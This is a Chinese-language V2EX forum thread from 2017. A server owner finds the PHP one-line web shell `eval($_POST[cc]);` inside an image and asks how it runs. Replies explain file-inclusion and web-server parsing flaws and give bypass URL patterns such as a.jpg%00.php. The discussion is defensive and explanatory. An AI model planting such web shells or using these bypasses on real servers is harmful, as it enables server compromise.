发现图片里含有一句话木马,含有木马的图片到底是怎么运行的

2017-12-14 15:52:34 +08:00
 zoneself

发现服务器里的一个图片里含有一句话木马
eval($_POST[cc]);
我吧图片下载到本地,在本地环境中引用图片,
没发现什么多余的文件或者恶意代码,请大牛指导下,携带这种木马的图片会不会有风险?
他们在服务器端到底是怎么执行的?
在线等

21087 次点击
所在节点    PHP
35 条回复
tabris17
2017-12-14 15:55:20 +08:00
我记得以前可以通过 pathinfo 的漏洞来运行
zoneself
2017-12-14 15:55:48 +08:00
@inroading 大牛,来指导下
zoneself
2017-12-14 15:59:18 +08:00
@tabris17 现在是不是不行了?
fcten
2017-12-14 16:05:30 +08:00
只要让服务器把图片当作 php 脚本解析就行了,方法有很多,除了楼上提到的以外也有可能有本地文件包含漏洞
tar
2017-12-14 16:09:23 +08:00
两种情况,第一种是服务器解析成了 php 格式的才是真正的木马,就是用解析漏洞进行解析为执行代码;第二种是测试的时候,比如前端限制了只允许上传图片格式的,那么先拦截包,多发送几次,第一次可能没有改文件的后缀,就成功上传上了,后面改了后缀被拒绝就没上传成功,于是你就发现你服务器里面有个图片马(纯猜测)
sola97
2017-12-14 16:17:01 +08:00
解析成 php 拿菜刀连
zoneself
2017-12-14 16:27:26 +08:00
@sola97 如何解析? 你的意思是本地服务器吧线上的一个图片地址解析成 php 在本地执行吗?
@tar 是图片里含有木马哈,jpg 格式的,不是 php 格式的
@fcten 请问大佬,怎么让本地服务器吧图片当做 php 解析呢? 本地环境是 phpstudy
anoymoux
2017-12-14 16:33:18 +08:00
直接留 eval 的后门很容易被检测到,所以把一句话放图片里,然后搭配 include 来用........
OpenJerry
2017-12-14 16:33:23 +08:00
图片马上传后利用文件包含漏洞来执行
Telegram
2017-12-14 16:35:18 +08:00
把图片 include 呢?方法很多的。

也有可能是黑客测试时留下的,不一定被入侵成功了。比如我测试上传漏洞,上传一个扩展名是 jpg 的文件,尝试利用漏洞截断,达到服务器把这个文件保存成 php 的文件目的,结果没成功,还是保存成了 jpg,就留下了这么一个文件。
lxy
2017-12-14 16:58:29 +08:00
Nginx 文件类型错误解析漏洞。前不久我参考这个 https://www.cnblogs.com/batsing/p/nginx_bug1_attack.html 做了测试,nginx/1.13.6,php-7.1.11 ,问题依然存在。想不明白为什么 Nginx 和 PHP 一直很难搭档,没有点改变。
zoneself
2017-12-14 17:01:53 +08:00
@Telegram 嗯 我吧图片放在本地环境下 用 include 引用图片地址,执行了,生成了一个 php 文件,可以执行。<br/>然后我用 include 方法远程引用线上的图片,线上没生成 php 文件呢,线上没生成 php 呢,我就纳闷这个图片包含的木马是怎么执行的,如果他可以在线上上传 php 或者修改 php 文件,就没有这么麻烦了吧,直接上传或者修改成大马就行了……
WordTian
2017-12-14 17:03:48 +08:00
cat *.jpg | sh
zoneself
2017-12-14 17:05:02 +08:00
@lxy 线上服务器是 iis 呢 不是 nginx
mingzu
2017-12-14 17:05:47 +08:00
没事呀,只要这个图片不解析成 PHP 就可以了。

图片后缀会当成图片解析。

比如很早以前的 iis 6.0 漏洞就会把图片后缀的后缀截成 php 后缀, 当作 PHP 脚本运行。
zoneself
2017-12-14 17:15:57 +08:00
@mingzu 我试了下,现在不行 哈哈
hasdream
2017-12-14 17:22:23 +08:00
很早之前可以 a.com/a.jpg/n.php 或者 a.com/a.jpg%00.php
zoneself
2017-12-14 17:28:51 +08:00
@hasdream 你说的是 a.com/a.jpg 空格.php 吧 这个我也试了,也失效啦
Sanko
2017-12-14 17:32:40 +08:00
a.asp/1.jpg 即*.asp 目录下的文件会被当做可执行脚本执行,好像是 iis6.0 的漏洞
Va1n3R
2017-12-14 17:44:12 +08:00
解析漏洞以及文件包含可以触发这个后门,现在稍微环境新一点都不会有解析漏洞的。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/414740

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX